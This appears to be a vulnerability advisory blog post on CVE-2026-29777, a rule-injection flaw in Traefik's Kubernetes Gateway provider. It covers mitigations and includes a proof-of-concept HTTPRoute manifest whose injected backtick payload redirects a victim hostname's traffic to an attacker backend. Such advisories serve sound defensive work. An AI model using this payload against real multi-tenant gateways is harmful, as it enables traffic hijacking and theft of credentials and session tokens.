Traefik, Rule Injection, CVE-2026-29777 (High)

Listen to this Post

The vulnerability, identified as CVE-2026-29777, exists in Traefik’s Kubernetes Gateway provider. It stems from improper neutralization of special elements used in downstream components, specifically when building router rules from HTTPRoute resources. The provider formats rule strings using backtick-delimited literals for functions like `Header(name, value)` and Query(name, value), interpolating tenant-controlled match values directly without escaping. A malicious tenant with write access to an HTTPRoute can inject a backtick character into a header or query parameter value. This backtick terminates the intended string literal, allowing the attacker to append additional rule language tokens, such as `) || HostRegexp(.) || (` . Due to operator precedence, this injected OR branch alters the parsed Abstract Syntax Tree (AST), changing the root operator from AND to OR. Consequently, the generated rule no longer enforces the intended `Host(…)` constraint from the Gateway listener, bypassing hostname-based isolation in shared multi-tenant deployments. This routing hijack allows traffic intended for a victim’s hostname to be redirected to an attacker-controlled backend, potentially leading to credential capture or request forgery.

dailycve form:

Platform: Traefik
Version: Prior to 3.6.10
Vulnerability: Rule Injection
Severity: HIGH (CVSS 8.7)
date: 2026-03-11

Prediction: Patched (2026-03-11)

What Undercode Say:

Analytics:

The vulnerability is a classic code injection (CWE-74) where the lack of output sanitization allows control-plane objects to manipulate data-plane behavior. For shared gateway environments, the risk is elevated to critical as it breaks hard multi-tenancy promises.
Showing bash commands and codes related to the blog

Example of the vulnerable code pattern in httproute.go (Conceptual)
The provider used fmt.Sprintf with backticks, allowing injection.
Vulnerable pattern: fmt.Sprintf("Header(<code>%s</code>,<code>%s</code>)", name, value)
To test if your current Traefik version is vulnerable (Conceptual Proof of Concept)
Create an HTTPRoute with a malicious header value
cat <<EOF | kubectl apply -f -
apiVersion: gateway.networking.k8s.io/v1beta1
kind: HTTPRoute
metadata:
name: malicious-route
namespace: attacker-tenant
spec:
parentRefs:
- name: shared-gateway
rules:
- matches:
- headers:
- name: X-Inject
value: "injected\`) || HostRegexp(\`^victim.com\`) && PathPrefix(\`/"
backendRefs:
- name: attacker-backend
port: 80
EOF
Expected behavior: Request with Host: victim.com and any path routes to attacker-backend.
Command to check running Traefik version (if using Docker)
docker exec [traefik-container-name] traefik version
Command to check Traefik logs for rule parsing errors
kubectl logs -n traefik-system deployment/traefik | grep -i "rule.parsing"

Exploit:

An attacker exploits this by creating or updating an HTTPRoute resource. The payload is placed in a field like spec.rules[].matches[].headers[].value. The value terminates the backtick and injects a logical OR condition, such as `) || HostRegexp(`.`) &&. This effectively neutralizes the original Host matcher. When a request matching the injected criteria (e.g., any host) arrives, it is routed according to the attacker’s route rules instead of the victim’s.

Protection from this CVE:

  1. Immediate Upgrade: Upgrade Traefik to version v3.6.10 or later, which contains the fix using safe quoting (%q) instead of backticks for interpolation.
  2. Input Validation: If immediate upgrade is impossible, implement a mutating admission webhook in Kubernetes to validate or reject HTTPRoute resources containing backticks or other rule-language metacharacters in match values.
  3. Network Policies: Implement strict Kubernetes Network Policies to limit egress traffic from potentially hijacked backends, mitigating the impact of data exfiltration.
  4. Monitor HTTPRoute Creations/Updates: Audit and monitor changes to HTTPRoute resources, specifically looking for unusual patterns in header and query parameter values.

Impact:

Successful exploitation leads to a complete bypass of Gateway API listener hostname constraints. In a shared gateway model, this breaks tenant isolation. An attacker can steal traffic intended for other services hosted on the same gateway, potentially capturing sensitive data like authentication tokens, session cookies, or API keys sent to the victim’s domain. This can be a precursor to further attacks like session hijacking or credential theft .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top